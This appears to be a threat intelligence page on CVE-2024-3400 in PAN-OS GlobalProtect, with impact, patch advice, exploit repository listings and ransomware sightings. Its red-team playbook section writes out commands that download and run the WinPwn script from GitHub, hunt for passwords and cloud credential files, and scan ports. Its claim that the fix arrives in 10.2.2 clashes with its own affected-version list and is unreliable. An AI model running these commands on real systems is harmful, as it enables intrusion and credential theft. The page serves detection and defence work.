CVE-2024-3400
Overview
This vulnerability is a command injection flaw caused by improper handling of arbitrary file creation within the GlobalProtect feature of Palo Alto Networks PAN-OS. The root cause lies in insufficient input validation of file paths manipulated via crafted HTTP requests, allowing injection of shell commands. The affected component is the GlobalProtect portal and SSL VPN subsystem in specific PAN-OS versions, where crafted cookie headers enable unauthorized file manipulation leading to command execution.
Vulnerability Description
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Impact
An unauthenticated attacker can execute arbitrary code with root privileges on the firewall, gaining full control over the affected PAN-OS device. This enables complete system compromise, including the ability to manipulate firewall policies, intercept or disrupt network traffic, and move laterally within the network. No user interaction or credentials are required, increasing the risk of rapid exploitation and severe operational impact for organizations relying on the vulnerable firewall.
Solution
Apply the patches provided by Palo Alto Networks as detailed in their security advisory at https://security.paloaltonetworks.com/CVE-2024-3400. The fix is included in PAN-OS versions 10.2.2 and later. Administrators should upgrade affected PAN-OS instances promptly. No specific workarounds are recommended; reliance on vendor-supplied patches is necessary to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
0apt
|
— | ransomware.live |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability present in the GlobalProtect feature of Palo Alto Networks PAN-OS software stems from a command injection flaw that allows for arbitrary file creation. This critical security issue arises when input validation mechanisms fail, enabling an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The affected versions of PAN-OS, particularly those in the 10.2.x and 11.0.x series, exhibit this weakness due to improper handling of user-supplied data. The severity of this vulnerability is underscored by its CVSS score of 10.0, indicating a critical risk level that necessitates immediate attention from organizations utilizing these specific versions.
Attack vectors for exploiting this vulnerability are particularly concerning, as they do not require authentication. An attacker could leverage this flaw by sending crafted requests to the GlobalProtect feature, potentially leading to the execution of malicious commands on the firewall. This could allow for the manipulation of firewall configurations, unauthorized access to sensitive data, or even the establishment of persistent backdoors within the network infrastructure. Scenarios may include targeted attacks against organizations using vulnerable versions of PAN-OS, where attackers could disrupt operations, exfiltrate data, or deploy ransomware, thereby amplifying the potential damage.
The real-world impact of this vulnerability is significant, posing substantial business risks. Organizations relying on PAN-OS for their network security may find themselves exposed to a range of threats, including data breaches, service disruptions, and reputational damage. The ability for an attacker to gain root access to a firewall can lead to a complete compromise of network security, allowing for lateral movement within the organization and targeting of critical assets. The financial implications of such an attack can be severe, encompassing recovery costs, regulatory fines, and loss of customer trust. Furthermore, the potential for widespread exploitation increases as attackers continuously seek out high-value targets within the cybersecurity landscape.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating PAN-OS to the latest patched versions is crucial, as this will address the underlying flaw and enhance overall security posture. Additionally, organizations should employ intrusion detection systems (IDS) and firewalls configured to monitor for unusual traffic patterns or unauthorized access attempts. Conducting thorough security assessments and penetration testing can also help identify potential weaknesses within the network. Educating staff about the risks associated with command injection attacks and promoting best practices for secure coding can further reduce the likelihood of exploitation.
In conclusion, the command injection vulnerability in the GlobalProtect feature of PAN-OS represents a critical threat to organizations utilizing affected versions of this software. The potential for unauthorized access and control over network infrastructure underscores the need for immediate action to mitigate risks. By adopting proactive detection and mitigation strategies, organizations can safeguard their networks against the exploitation of this vulnerability and enhance their overall cybersecurity resilience.
CSURFACE threat intelligence has identified a notable surge in detection activity related to CVE-2024-3400, indicating increased exploitation attempts targeting vulnerable PAN-OS GlobalProtect deployments. This escalation aligns with the continued availability of multiple proof-of-concept exploits on public repositories, which likely lowers the barrier for adversaries to weaponize this critical vulnerability. Our telemetry also confirms persistent ransomware group interest, with several high-profile campaigns linked to this exploit vector, underscoring its operational use in the wild. Although the EPSS score remains stable, the qualitative increase in observed exploitation attempts and ransomware associations elevates the practical risk to organizations running affected PAN-OS versions. Defenders should recognize that this evolving threat landscape reflects a heightened likelihood of successful compromise, warranting increased vigilance despite the absence of a rapid upward trend in EPSS metrics.
Update 2 — May 18, 2026
CSURFACE threat intelligence has detected a modest increase in exploitation attempts targeting CVE-2024-3400, accompanied by the emergence of additional ransomware groups leveraging this vulnerability in their campaigns. This expansion of adversary interest is further evidenced by the appearance of new proof-of-concept exploits, which lower the barrier for threat actors to weaponize the flaw. Although the overall exploit prediction score remains high but stable, the diversification of ransomware actors and the availability of fresh exploitation tools signify a broadening attack surface. For defenders, this evolving landscape indicates an elevated operational risk, as multiple threat groups now actively incorporate this vulnerability into their tactics, techniques, and procedures. Consequently, the likelihood of successful intrusions exploiting PAN-OS GlobalProtect command injection vulnerabilities has increased, underscoring the need for sustained vigilance despite the absence of a dramatic surge in exploitation frequency.
Update 3 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-3400, accompanied by the emergence of new proof-of-concept tools that simplify vulnerability scanning and exploitation. This expansion in the exploit toolkit has lowered the technical barrier for adversaries, enabling a broader range of threat actors—including multiple ransomware groups such as 0apt, akira, and ransomhub—to integrate this critical PAN-OS GlobalProtect vulnerability into their operational playbooks. Although the overall frequency of exploitation attempts remains relatively stable, the diversification of tactics and the increasing availability of automated scanning capabilities significantly amplify the risk of successful intrusions. This evolution underscores a heightened threat environment where defenders must anticipate more frequent and varied exploitation attempts, elevating the operational risk associated with unpatched PAN-OS firewalls.
Update 4 — July 05, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-3400, with our telemetry indicating a significant uptick in attacker activity leveraging publicly available proof-of-concept tools. This surge reflects increased operationalization of the vulnerability by ransomware groups such as 0apt and ransomhub, who are integrating these exploits into their campaigns with greater frequency and sophistication. The proliferation of automated scanning scripts has lowered the barrier for opportunistic attackers, broadening the threat actor base beyond highly skilled adversaries. Consequently, the risk profile for unpatched Palo Alto Networks PAN-OS firewalls has intensified, as the combination of elevated exploitation volume and diverse attacker tactics increases the likelihood of successful compromise. While the overall probability of exploitation remains high as previously assessed, this recent escalation underscores an urgent need for heightened vigilance in detection and response efforts.
Affected Products (52)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Paloaltonetworks | Pan-Os | 10.2.0 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.0 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.0 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.1 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.1:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.1 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.1:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:h4:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h11:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h12:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h4:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h9:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.4 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.4 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:h10:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.4 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.4 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:h3:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.4 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:h4:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
exploits/linux/http/panos_telemetry_cmd_exec
|
remmons-r7, sfewer-r7 | Unknown | linux, unix | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation | Kr0ff | remote | linux_x86-64 | - | View |
GitHub PoCs (45)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
h4x0r-dz/CVE-2024-3400
CVE-2024-3400 Palo Alto OS Command Injection
|
h4x0r-dz | 161 | 25 | 2024-04-16 | View |
|
W01fh4cker/CVE-2024-3400-RCE-Scan
CVE-2024-3400-RCE
|
W01fh4cker | 91 | 7 | 2024-04-16 | View |
|
0x0d3ad/CVE-2024-3400
CVE-2024-3400
|
0x0d3ad | 70 | 24 | 2024-04-13 | View |
|
ihebski/CVE-2024-3400
CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect
|
ihebski | 33 | 5 | 2024-04-16 | View |
|
Chocapikk/CVE-2024-3400
|
Chocapikk | 15 | 3 | 2024-04-16 | View |
|
momika233/CVE-2024-3400
|
momika233 | 13 | 4 | 2024-04-14 | View |
|
Yuvvi01/CVE-2024-3400
|
Yuvvi01 | 11 | 5 | 2024-04-13 | View |
|
AdaniKamal/CVE-2024-3400
CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect
|
AdaniKamal | 7 | 4 | 2024-04-16 | View |
|
ak1t4/CVE-2024-3400
Global Protec Palo Alto File Write Exploit
|
ak1t4 | 9 | 1 | 2024-04-17 | View |
|
schooldropout1337/CVE-2024-3400
|
schooldropout1337 | 6 | 2 | 2024-04-18 | View |
|
0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection
|
0xr2r | 6 | 2 | 2024-04-25 | View |
|
zam89/CVE-2024-3400-pot
Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability
|
zam89 | 6 | 1 | 2024-04-24 | View |
|
retkoussa/CVE-2024-3400
CVE-2024-3400 : Palo Alto OS Command Injection - POC
|
retkoussa | 5 | 0 | 2024-04-17 | View |
|
HackingLZ/panrapidcheck
Extract useful information from PANOS support file for CVE-2024-3400
|
HackingLZ | 2 | 2 | 2024-04-19 | View |
|
ZephrFish/CVE-2024-3400-Canary
Have we not learnt from HoneyPoC?
|
ZephrFish | 2 | 1 | 2024-04-17 | View |
|
wa6n3r/CVE-2024-3400
|
wa6n3r | 1 | 1 | 2026-04-20 | View |
|
CerTusHack/CVE-2024-3400-PoC
|
CerTusHack | 2 | 0 | 2024-04-13 | View |
|
marconesler/CVE-2024-3400
Exploit for GlobalProtect CVE-2024-3400
|
marconesler | 2 | 0 | 2024-04-27 | View |
|
swaybs/CVE-2024-3400
Python script to check Palo Alto firewalls for CVE-2024-3400 exploit attempts
|
swaybs | 2 | 0 | 2024-04-18 | View |
|
Zedocun/PAN-OS-CVE-2024-3400-Command-Injection-Investigation
Investigation of a PAN-OS CVE-2024-3400 command injection attempt, analyzing payload delivery, internal processing, and ...
|
Zedocun | 1 | 0 | 2026-04-16 | View |
|
MrR0b0t19/CVE-2024-3400
Vulnerabilidad de palo alto
|
MrR0b0t19 | 0 | 1 | 2024-04-14 | View |
|
MurrayR0123/CVE-2024-3400-Compromise-Checker
A simple bash script to check for evidence of compromise related to CVE-2024-3400
|
MurrayR0123 | 0 | 1 | 2024-04-15 | View |
|
CONDITIONBLACK/CVE-2024-3400-POC
|
CONDITIONBLACK | 1 | 0 | 2024-04-16 | View |
|
hashdr1ft/SOC274-Palo-Alto-Networks-PAN-OS-Command-Injection-Vulnerability-Exploitation-CVE-2024-3400
|
hashdr1ft | 1 | 0 | 2025-02-02 | View |
|
P4rC3L/Global-Protect_VPN_Vuln
Testing a List of IP address incase they are vulnerable to CVE-2024-3400
|
P4rC3L | 0 | 0 | 2026-05-30 | View |
|
Nikki-the-Parcel/Global-Protect_VPN_Vuln
Testing a List of IP address incase they are vulnerable to CVE-2024-3400
|
Nikki-the-Parcel | 0 | 0 | 2026-05-30 | View |
|
LoanVitor/CVE-2024-3400-
|
LoanVitor | 0 | 0 | 2024-04-16 | View |
|
index2014/CVE-2024-3400-Checker
A check program for CVE-2024-3400, Palo Alto PAN-OS unauthenticated command injection vulnerability. Palo Alto 防火墙 PAN-O...
|
index2014 | 0 | 0 | 2024-04-17 | View |
|
hahasagined/CVE-2024-3400
EDL for IPs attacking customers with CVE-2024-3400
|
hahasagined | 0 | 0 | 2024-04-18 | View |
|
terminalJunki3/CVE-2024-3400-Checker
Check to see if your Palo Alto firewall has been compromised by running script againt support bundle.
|
terminalJunki3 | 0 | 0 | 2024-04-24 | View |
|
andrelia-hacks/CVE-2024-3400
|
andrelia-hacks | 0 | 0 | 2024-05-12 | View |
|
workshop748/CVE-2024-3400
Attempt at making the CVE-2024-3400 initial exploit (for educational purposes)
|
workshop748 | 0 | 0 | 2024-11-12 | View |
|
CyprianAtsyor/letsdefend-cve2024-3400-case-study
Detection, analysis, and response strategies for CVE-2024-3400 exploitation attempts targeting Palo Alto PAN-OS GlobalPr...
|
CyprianAtsyor | 0 | 0 | 2025-04-29 | View |
|
CyberBibs/SOC274---Palo-Alto-Networks-PAN-OS-Command-Injection-Vulnerability-Exploitation-CVE-2024-3400-
|
CyberBibs | 0 | 0 | 2025-06-08 | View |
|
codeblueprint/CVE-2024-3400
Simple Python code to check for arbitrary uploading for PaloAlto CVE-2024-3400
|
codeblueprint | 0 | 0 | 2024-04-18 | View |
|
Kr0ff/cve-2024-3400
Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation
|
Kr0ff | 0 | 0 | 2024-04-21 | View |
|
ivan-n0v/cve-2024-3400
|
ivan-n0v | 0 | 0 | 2024-05-19 | View |
|
FoxyProxys/CVE-2024-3400
|
FoxyProxys | 0 | 0 | 2024-04-13 | View |
|
sxyrxyy/CVE-2024-3400-Check
|
sxyrxyy | 0 | 0 | 2024-04-18 | View |
|
GhassanSabir/CVE-2024-3400-poc
CVE-2024-3400的攻击脚本
|
GhassanSabir | 0 | 0 | 2025-12-05 | View |
|
Ravaan21/CVE-2024-3400
CVE-2024-3400 POC written in Rust and Python
|
Ravaan21 | 0 | 0 | 2024-04-18 | View |
|
tfrederick74656/cve-2024-3400-poc
Simple POC for CVE-2024-3400
|
tfrederick74656 | 0 | 0 | 2024-04-18 | View |
|
pwnj0hn/CVE-2024-3400
Finding Palo Alto devices vulnerable to CVE-2024-3400.
|
pwnj0hn | 0 | 0 | 2024-04-19 | View |
|
Yafiah-Darwesh/cs50-cyber-paloalto-oauth
CS50 Cybersecurity final project — Palo Alto OAuth token breach (CVE-2024-3400)
|
Yafiah-Darwesh | 0 | 0 | 2025-10-01 | View |
|
nanwinata/CVE-2024-3400
CVE-2024-3400 PAN-OS Vulnerability Scanner.
|
nanwinata | 0 | 0 | 2024-11-30 | View |
Ransomware Groups 1
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (30 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-3400 |
| security.paloaltonetworks.com |
GitHub CVE
vendor-advisory
|
https://security.paloaltonetworks.com/CVE-2024-3400 |
| unit42.paloaltonetworks.com |
GitHub CVE
technical-description
|
https://unit42.paloaltonetworks.com/cve-2024-3400/ |
| volexity.com |
GitHub CVE
technical-description
|
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/ |
| paloaltonetworks.com |
GitHub CVE
technical-description
|
https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-3400 |